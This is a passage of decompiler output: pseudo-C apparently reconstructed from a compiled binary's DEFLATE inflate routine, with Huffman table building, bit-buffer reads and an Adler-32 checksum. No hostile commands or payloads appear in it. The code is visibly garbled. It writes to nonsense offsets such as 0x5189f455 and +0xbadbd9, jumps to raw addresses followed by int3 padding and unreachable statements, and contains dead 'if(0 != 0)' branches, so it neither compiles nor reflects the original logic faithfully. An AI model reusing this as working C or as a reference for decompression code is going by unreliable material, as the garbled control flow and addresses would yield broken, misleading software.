    																						 *((intOrPtr*)(_t2870 - 0x11c)) = ( *(_t2870 - 0x10) & 0xfffffff8) +  *(_t2870 - 0x30);
    																						do {
    																							 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2211 * 0));
    																							 *((intOrPtr*)( *(_t2870 - 0x14) + (4 << 0))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (4 << 0)));
    																							_t2211 =  *(_t2870 - 0x14) + 8;
    																							 *(_t2870 - 0x14) = _t2211;
    																							_t2612 =  *(_t2870 - 0x30) + 8;
    																							 *(_t2870 - 0x30) = _t2612;
    																							_t1789 =  *(_t2870 - 0x30);
    																						} while (_t1789 <  *((intOrPtr*)(_t2870 - 0x11c)));
    																						_t2086 =  *(_t2870 - 0x10) & 0x00000007;
    																						 *(_t2870 - 0x10) = _t2086;
    																						if( *(_t2870 - 0x10) >= 3) {
    																							do {
    																								goto L522;
    																								L523:
    																								 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t1789 * 0));
    																								 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 0)));
    																								 *((char*)( *(_t2870 - 0x14) + (1 << 1))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 1)));
    																								_t2086 =  *(_t2870 - 0x14) + 3;
    																								 *(_t2870 - 0x14) = _t2086;
    																								 *(_t2870 - 0x30) =  *(_t2870 - 0x30) + 3;
    																								_t1789 =  *(_t2870 - 0x10) - 3;
    																								 *(_t2870 - 0x10) = _t1789;
    																							} while ( *(_t2870 - 0x10) > 2);
    																							if( *(_t2870 - 0x10) > 0) {
    																								_t1798 =  *(_t2870 - 0x14);
    																								 *_t1798 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2086 * 0));
    																								if( *(_t2870 - 0x10) > 1) {
    																									 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t1798 << 0)));
    																								}
    																								_t2086 =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
    																								 *(_t2870 - 0x14) = _t2086;
    																							}
    																						} else {
    																							if( *(_t2870 - 0x10) != 0) {
    																								_t2086 =  *(_t2870 - 0x14);
    																								 *_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2612 * 0));
    																								if( *(_t2870 - 0x10) > 1) {
    																									_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t2086 << 0)));
    																									 *( *(_t2870 - 0x14) + (1 << 0)) = _t2086;
    																								}
    																								 *(_t2870 - 0x14) =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
    																							}
    																						}
    																						goto L350;
    																					}
    																					L601:
    																					 *(_t2075 + 0x5189f455) =  *(_t2075 + 0x5189f455) | _t2086;
    																					 *(_t2075 + 0x4289f045) =  *(_t2075 + 0x4289f045) | _t2086;
    																					_t2870 = _t2870;
    																					 *(_t2075 + 0x5189dc55) =  *(_t2075 + 0x5189dc55) | _t2086;
    																					 *((intOrPtr*)(_t2075 + 0x4d8b0845)) =  *((intOrPtr*)(_t2075 + 0x4d8b0845)) - _t2086;
    																					asm("cld");
    																					 *( *(_t2870 + 0x10)) = _t2465 + 1 -  *(_t2870 + 0xc);
    																					 *( *(_t2870 + 0x1c)) =  *(_t2870 - 0x14) -  *(_t2870 + 0x18);
    																					if(( *(_t2870 + 0x20) & 0x00000009) != 0 &&  *(_t2870 - 0x1c) >= 0) {
    																						 *(_t2870 - 0x58) =  *(_t2870 + 0x18);
    																						 *(_t2870 - 0x98) =  *( *(_t2870 + 0x1c));
    																						 *(_t2870 - 0x20) =  *( *(_t2870 + 8) + 0x1c) & 0x0000ffff;
    																						 *(_t2870 - 0x2c) =  *( *(_t2870 + 8) + 0x1c) >> 0x10;
    																						_t1700 =  *(_t2870 - 0x98);
    																						_t1701 = _t1700 / 0x15b0;
    																						_t2473 = _t1700 % 0x15b0;
    																						 *(_t2870 - 0xa0) = _t2473;
    																						while( *(_t2870 - 0x98) != 0) {
    																							 *(_t2870 - 0x84) = 0;
    																							while( *(_t2870 - 0x84) + 7 <  *(_t2870 - 0xa0)) {
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + _t2473 * 0) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 0)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 1)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 3) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 2)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 5) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 6) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 7) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								_t2473 =  *(_t2870 - 0x84) + 8;
    																								 *(_t2870 - 0x84) = _t2473;
    																								_t1701 =  *(_t2870 - 0x58) + 8;
    																								 *(_t2870 - 0x58) = _t1701;
    																							}
    																							while(1) {
    																								_t2097 =  *(_t2870 - 0x84);
    																								if(_t2097 >=  *(_t2870 - 0xa0)) {
    																									break;
    																								}
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x58) =  *(_t2870 - 0x58) + 1;
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								_t1701 =  *(_t2870 - 0x84) + 1;
    																								 *(_t2870 - 0x84) = _t1701;
    																							}
    																							goto 0x1b0d69;
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							 *(_t2870 - 0x20) = _t1701 % _t2097;
    																							_t1706 =  *(_t2870 - 0x2c);
    																							_t1701 = _t1706 / 0xfff1;
    																							 *(_t2870 - 0x2c) = _t1706 % 0xfff1;
    																							_t2473 =  *(_t2870 - 0x98) -  *(_t2870 - 0xa0);
    																							 *(_t2870 - 0x98) = _t2473;
    																							 *(_t2870 - 0xa0) = 0x15b0;
    																						}
    																						_t1704 = ( *(_t2870 - 0x2c) << 0x10) +  *(_t2870 - 0x20);
    																						_t2094 =  *(_t2870 + 8);
    																						 *((intOrPtr*)(_t2094 + 0x1c)) = _t1704;
    																						if( *(_t2870 - 0x1c) == 0 && ( *(_t2870 + 0x20) & 0x00000001) != 0) {
    																							goto 0x1b0d81;
    																							asm("int3");
    																							if( *((intOrPtr*)(_t1704 + 0x1c)) !=  *((intOrPtr*)(_t2094 + 0x10))) {
    																								 *(_t2870 - 0x1c) = 0xfffffffe;
    																							}
    																						}
    																					}
    																					_t1688 =  *(_t2870 - 0x1c);
    																					goto L622;
    																				} else {
    																					goto L502;
    																				}
    																			} else {
    																				_t1789 =  *(_t2870 + 0x20) & 0x00000004;
    																				if(_t1789 == 0) {
    																					goto L498;
    																				} else {
    																					L495:
    																					 *(_t2870 - 0x1c) = 0xffffffff;
    																					_t2086 =  *(_t2870 + 8);
    																					 *_t2086 = 0x25;
    																				}
    																			}
    																		} else {
    																			L476:
    																			_t2233 =  *(_t2870 - 8);
    																			if(_t2233 >=  *(_t2870 - 0x24)) {
    																				L490:
    																				goto 0x1b0cba;
    																				asm("int3");
    																				asm("int3");
    																				asm("int3");
    																				 *(_t2870 - 0x120) = (_t2592 << _t2233) - 0x00000001 &  *(_t2870 - 0xc);
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																				 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																				_t2592 = 0;
    																				if(0 != 0) {
    																					goto L476;
    																				} else {
    																					_t1789 =  *(_t2870 - 0x28) +  *(_t2870 - 0x120);
    																					 *(_t2870 - 0x28) = _t1789;
    																					goto L493;
    																				}
    																			} else {
    																				L477:
    																				_t2465 =  *(_t2870 - 4);
    																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xdc) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L488;
    																				} else {
    																					L478:
    																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t1692 == 0) {
    																						 *(_t2870 - 0xdc) = 0;
    																						L486:
    																						L488:
    																						if(0 != 0) {
    																							goto L477;
    																						} else {
    																							_t2592 =  *(_t2870 - 0xdc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 0xc) = _t2592;
    																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																							_t2233 =  *(_t2870 - 8);
    																							if(_t2233 <  *(_t2870 - 0x24)) {
    																								goto L477;
    																							} else {
    																								goto L490;
    																							}
    																						}
    																					} else {
    																						L479:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t2086 =  *(_t2870 + 8);
    																						 *_t2086 = 0x1b;
    																					}
    																				}
    																			}
    																		}
    																	}
    																} else {
    																	_t2190 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																	if(_t2190 >= 2) {
    																		_t1769 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    																		 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2190 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    																		 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    																		goto L468;
    																	} else {
    																		L439:
    																		_t1769 =  *((short*)( *(_t2870 + 8) + (_t2566 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																		 *(_t2870 - 0x44) = _t1769;
    																		if( *(_t2870 - 0x44) < 0) {
    																			if( *(_t2870 - 8) <= 0xa) {
    																				goto L452;
    																			} else {
    																				 *(_t2870 - 0x4c) = 0xa;
    																				do {
    																					_t2588 =  *(_t2870 + 8) + (_t1769 << 0) + 0x40;
    																					_t1769 =  !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001);
    																					 *(_t2870 - 0x44) =  *((short*)(_t2588 + 0x920 + _t1769 * 2));
    																					 *(_t2870 - 0x4c) =  *(_t2870 - 0x4c) + 1;
    																					if( *(_t2870 - 0x44) < 0) {
    																						goto L449;
    																					}
    																					break;
    																					L449:
    																					_t1769 =  *(_t2870 - 0x4c) + 1;
    																				} while ( *(_t2870 - 8) >= _t1769);
    																				if( *(_t2870 - 0x44) < 0) {
    																					goto L452;
    																				} else {
    																					goto L465;
    																				}
    																			}
    																		} else {
    																			 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
    																			if( *(_t2870 - 0x4c) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x4c)) {
    																				L452:
    																				_t2086 =  *(_t2870 - 4);
    																				if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xd4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L463;
    																				} else {
    																					L453:
    																					_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t2465 == 0) {
    																						 *(_t2870 - 0xd4) = 0;
    																						L461:
    																						L463:
    																						if(0 != 0) {
    																							goto L452;
    																						} else {
    																							_t2566 =  *(_t2870 - 0xd4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 0xc) = _t2566;
    																							_t1769 =  *(_t2870 - 8) + 8;
    																							 *(_t2870 - 8) = _t1769;
    																							if( *(_t2870 - 8) < 0xf) {
    																								goto L439;
    																							} else {
    																								goto L465;
    																							}
    																						}
    																					} else {
    																						L454:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t1692 =  *(_t2870 + 8);
    																						 *_t1692 = 0x1a;
    																					}
    																				}
    																			} else {
    																				L465:
    																				goto L468;
    																			}
    																		}
    																	}
    																}
    															} else {
    																L421:
    																if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
    																	L435:
    																	goto 0x1b0c45;
    																	asm("int3");
    																	asm("int3");
    																	asm("int3");
    																	 *(_t2870 - 0x124) = (_t2566 << _t2180) - 0x00000001 &  *(_t2870 - 0xc);
    																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																	_t2180 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																	 *(_t2870 - 8) = _t2180;
    																	_t2566 = 0;
    																	if(0 != 0) {
    																		goto L421;
    																	} else {
    																		_t1769 =  *(_t2870 - 0x10) +  *(_t2870 - 0x124);
    																		 *(_t2870 - 0x10) = _t1769;
    																		goto L437;
    																	}
    																} else {
    																	L422:
    																	_t2086 =  *(_t2870 - 4);
    																	if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																		 *(_t2870 - 0xa4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																		goto L433;
    																	} else {
    																		L423:
    																		_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																		if(_t2465 == 0) {
    																			 *(_t2870 - 0xa4) = 0;
    																			L431:
    																			L433:
    																			if(0 != 0) {
    																				goto L422;
    																			} else {
    																				_t2566 =  *(_t2870 - 0xa4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																				 *(_t2870 - 0xc) = _t2566;
    																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																				_t2180 =  *(_t2870 - 8);
    																				if(_t2180 <  *(_t2870 - 0x24)) {
    																					goto L422;
    																				} else {
    																					goto L435;
    																				}
    																			}
    																		} else {
    																			L424:
    																			 *(_t2870 - 0x1c) = 1;
    																			_t1692 =  *(_t2870 + 8);
    																			 *_t1692 = 0x19;
    																		}
    																	}
    																}
    															}
    														} else {
    															L531:
    															_t1692 =  *( *(_t2870 + 8) + 0x14) & 0x00000001;
    															if(_t1692 == 0) {
    																L48:
    																if( *(_t2870 - 8) >= 3) {
    																	L62:
    																	 *( *(_t2870 + 8) + 0x14) =  *(_t2870 - 0xc) & 0x00000007;
    																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 3;
    																	 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
    																	if(0 != 0) {
    																		goto L48;
    																	} else {
    																		 *( *(_t2870 + 8) + 0x18) =  *( *(_t2870 + 8) + 0x14) >> 1;
    																		_t1692 =  *(_t2870 + 8);
    																		if( *((intOrPtr*)(_t1692 + 0x18)) != 0) {
    																			_t2086 =  *(_t2870 + 8);
    																			if( *((intOrPtr*)(_t2086 + 0x18)) != 3) {
    																				if( *( *(_t2870 + 8) + 0x18) != 1) {
    																					 *(_t2870 - 0x10) = 0;
    																					L189:
    																					if( *(_t2870 - 0x10) >= 3) {
    																						goto 0x1b0a5e;
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						asm("int3");
    																						_push( *(_t2870 + 8) + (_t1692 << 1) + 0x40);
    																						_t1743 =  *( *0x00D59D9D)();
    																						_t2873 = _t2873 + 0xc;
    																						 *(_t2870 - 0x10) = 0;
    																						L210:
    																						_t2136 =  *(_t2870 + 8);
    																						if( *(_t2870 - 0x10) >=  *((intOrPtr*)(_t2136 + (_t1743 << 1) + 0x2c))) {
    																							 *((intOrPtr*)( *(_t2870 + 8) + (_t2136 << 1) + 0x2c)) = 0x13;
    																							goto L231;
    																						} else {
    																							L212:
    																							if( *(_t2870 - 8) >= 3) {
    																								L226:
    																								 *(_t2870 - 0x114) =  *(_t2870 - 0xc) & 0x00000007;
    																								_t1987 =  *(_t2870 - 0xc) >> 3;
    																								 *(_t2870 - 0xc) = _t1987;
    																								 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
    																								if(0 != 0) {
    																									goto L212;
    																								} else {
    																									_t1743 =  *(_t2870 - 0x114);
    																									 *( *(_t2870 + 8) + (_t1987 << 1) + 0x40 + ( *( *(_t2870 - 0x10) + 0x1aba14) & 0x000000ff)) = _t1743;
    																									 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
    																									goto L210;
    																								}
    																							} else {
    																								L213:
    																								_t1692 =  *(_t2870 - 4);
    																								if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																									 *(_t2870 - 0xc0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																									goto L224;
    																								} else {
    																									L214:
    																									_t2086 =  *(_t2870 + 0x20) & 0x00000002;
    																									if(_t2086 == 0) {
    																										 *(_t2870 - 0xc0) = 0;
    																										L222:
    																										L224:
    																										if(0 != 0) {
    																											goto L213;
    																										} else {
    																											 *(_t2870 - 0xc) =  *(_t2870 - 0xc0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																											if( *(_t2870 - 8) < 3) {
    																												goto L213;
    																											} else {
    																												goto L226;
    																											}
    																										}
    																									} else {
    																										L215:
    																										 *(_t2870 - 0x1c) = 1;
    																										_t2465 =  *(_t2870 + 8);
    																										 *_t2465 = 0xe;
    																									}
    																								}
    																							}
    																						}
    																					} else {
    																						L190:
    																						_t428 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
    																						if( *(_t2870 - 8) >=  *_t428) {
    																							L204:
    																							_t456 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
    																							 *( *(_t2870 + 8) + 0x2c +  *(_t2870 - 0x10) * 4) = (0x00000001 <<  *_t456) - 0x00000001 &  *(_t2870 - 0xc);
    																							_t464 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
    																							 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *_t464;
    																							_t468 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
    																							_t2759 =  *_t468;
    																							_t2000 =  *(_t2870 - 8) - _t2759;
    																							 *(_t2870 - 8) = _t2000;
    																							if(0 != 0) {
    																								goto L190;
    																							} else {
    																								goto 0x1b0a4a;
    																								asm("int3");
    																								_t1692 =  *(_t2870 - 0x10);
    																								 *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1692 * 4)) =  *((intOrPtr*)(_t2000 + 0x2c + _t2759 * 4)) +  *((intOrPtr*)(0x1aba28 +  *(_t2870 - 0x10) * 4));
    																								 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
    																								goto L189;
    																							}
    																						} else {
    																							L191:
    																							_t2465 =  *(_t2870 - 4);
    																							if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																								 *(_t2870 - 0xe0) =  *( *(_t2870 - 4)) & 0x000000ff;
    																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																								goto L202;
    																							} else {
    																								L192:
    																								_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																								if(_t1692 == 0) {
    																									 *(_t2870 - 0xe0) = 0;
    																									L200:
    																									L202:
    																									if(0 != 0) {
    																										goto L191;
    																									} else {
    																										 *(_t2870 - 0xc) =  *(_t2870 - 0xe0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																										 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																										_t453 =  *(_t2870 - 0x10) + 0x1ab010; // 0x7030200
    																										if( *(_t2870 - 8) <  *_t453) {
    																											goto L191;
    																										} else {
    																											goto L204;
    																										}
    																									}
    																								} else {
    																									L193:
    																									 *(_t2870 - 0x1c) = 1;
    																									_t2086 =  *(_t2870 + 8);
    																									 *_t2086 = 0xb;
    																								}
    																							}
    																						}
    																					}
    																				} else {
    																					 *(_t2870 - 0x60) =  *(_t2870 + 8) + 0x40 + _t1692 * 0;
    																					 *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) = 0x120;
    																					 *( *(_t2870 + 8) + 0xbadbd9) = 0x20;
    																					_push(0x20);
    																					_push(5);
    																					_push( *(_t2870 + 8) + 0xbadbed);
    																					_t2086 =  *0x00D59D9D;
    																					 *_t2086();
    																					_t2873 = _t2873 + 0xc;
    																					 *(_t2870 - 0x5c) = 0;
    																					while( *(_t2870 - 0x5c) <= 0x8f) {
    																						 *( *(_t2870 - 0x60)) = 8;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0xff) {
    																						 *( *(_t2870 - 0x60)) = 9;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0x117) {
    																						 *( *(_t2870 - 0x60)) = 7;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					while( *(_t2870 - 0x5c) <= 0x11f) {
    																						 *( *(_t2870 - 0x60)) = 8;
    																						_t2086 =  *(_t2870 - 0x60) + 1;
    																						 *(_t2870 - 0x60) = _t2086;
    																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
    																					}
    																					L231:
    																					L233:
    																					if( *( *(_t2870 + 8) + 0x18) < 0) {
    																						goto L350;
    																					} else {
    																						 *((intOrPtr*)(_t2870 - 0x68)) =  *(_t2870 + 8) + 0x40 +  *( *(_t2870 + 8) + 0x18) * 0xda0;
    																						_push(0x40);
    																						_push(0);
    																						_push(_t2870 - 0x1a8);
    																						 *( *0x00D59D9D)();
    																						_push(0x800);
    																						_push(0);
    																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x120);
    																						 *( *0x00D59D9D)();
    																						_push(0x480);
    																						_push(0);
    																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x920);
    																						 *( *0x00D59D9D)();
    																						_t2873 = _t2873 + 0x24;
    																						 *(_t2870 - 0x64) = 0;
    																						while( *(_t2870 - 0x64) <  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
    																							 *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) =  *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) + 1;
    																							 *(_t2870 - 0x64) =  *(_t2870 - 0x64) + 1;
    																						}
    																						 *(_t2870 - 0xd8) = 0;
    																						 *(_t2870 - 0x9c) = 0;
    																						_t1692 = 4 << 0;
    																						 *(_t2870 + 0xfffffffffffffe9c) = 0;
    																						_t2465 = 0;
    																						 *(_t2870 + 0xfffffffffffffe98) = 0;
    																						 *(_t2870 - 0x64) = 1;
    																						while( *(_t2870 - 0x64) <= 0xf) {
    																							 *(_t2870 - 0xd8) =  *(_t2870 - 0xd8) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8));
    																							 *(_t2870 - 0x9c) =  *(_t2870 - 0x9c) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8)) << 1;
    																							_t2465 =  *(_t2870 - 0x64);
    																							 *(_t2870 + _t2465 * 4 - 0x164) =  *(_t2870 - 0x9c);
    																							_t1692 =  *(_t2870 - 0x64) + 1;
    																							 *(_t2870 - 0x64) = _t1692;
    																						}
    																						if( *(_t2870 - 0x9c) == 0x10000 ||  *(_t2870 - 0xd8) <= 1) {
    																							 *(_t2870 - 0x78) = 0xffffffff;
    																							 *(_t2870 - 0x80) = 0;
    																							while(1) {
    																								_t2666 =  *(_t2870 - 0x80);
    																								if(_t2666 >=  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
    																									break;
    																								}
    																								 *(_t2870 - 0x34) = 0;
    																								 *(_t2870 - 0x74) =  *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x80)) & 0x000000ff;
    																								if( *(_t2870 - 0x74) != 0) {
    																									 *(_t2870 - 0xe8) =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168);
    																									_t2719 =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) + 1;
    																									 *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) = _t2719;
    																									_t2331 =  *(_t2870 - 0x74);
    																									 *(_t2870 - 0xc8) = _t2331;
    																									while( *(_t2870 - 0xc8) > 0) {
    																										_t2331 =  *(_t2870 - 0x34) << 0x00000001 |  *(_t2870 - 0xe8) & 0x00000001;
    																										 *(_t2870 - 0x34) = _t2331;
    																										_t2719 =  *(_t2870 - 0xc8) - 1;
    																										 *(_t2870 - 0xc8) = _t2719;
    																										 *(_t2870 - 0xe8) =  *(_t2870 - 0xe8) >> 1;
    																									}
    																									if( *(_t2870 - 0x74) > 0xa) {
    																										 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2));
    																										if( *(_t2870 - 0x6c) == 0) {
    																											 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2)) =  *(_t2870 - 0x78);
    																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
    																											 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
    																										}
    																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 9;
    																										 *(_t2870 - 0xd0) =  *(_t2870 - 0x74);
    																										while( *(_t2870 - 0xd0) > 0xb) {
    																											 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
    																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
    																											if( *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) != 0) {
    																												 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2));
    																											} else {
    																												 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x78);
    																												 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
    																												 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
    																											}
    																											 *(_t2870 - 0xd0) =  *(_t2870 - 0xd0) - 1;
    																										}
    																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
    																										 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
    																										 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x80);
    																									} else {
    																										 *((short*)(_t2870 - 0xcc)) =  *(_t2870 - 0x74) << 0x00000009 |  *(_t2870 - 0x80);
    																										while( *(_t2870 - 0x34) < 0x400) {
    																											goto 0x1b0ab1;
    																											asm("int3");
    																											 *((short*)(_t2719 + 0x120 + _t2331 * 2)) =  *((intOrPtr*)(_t2870 - 0xcc));
    																											_t2331 =  *(_t2870 - 0x74);
    																											_t2719 = (1 << _t2331) +  *(_t2870 - 0x34);
    																											 *(_t2870 - 0x34) = 1;
    																										}
    																									}
    																									goto L248;
    																								} else {
    																									L248:
    																									 *(_t2870 - 0x80) =  *(_t2870 - 0x80) + 1;
    																									continue;
    																								}
    																								break;
    																							}
    																							if( *( *(_t2870 + 8) + 0x18) != 2) {
    																								L349:
    																								_t2086 =  *( *(_t2870 + 8) + 0x18) - 1;
    																								 *( *(_t2870 + 8) + 0x18) = _t2086;
    																								goto L233;
    																							} else {
    																								 *(_t2870 - 0x10) = 0;
    																								L274:
    																								_t2669 =  *(_t2870 + 8);
    																								_t1900 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2666 * 0)) +  *((intOrPtr*)(_t2669 + 0x30));
    																								if( *(_t2870 - 0x10) >= _t1900) {
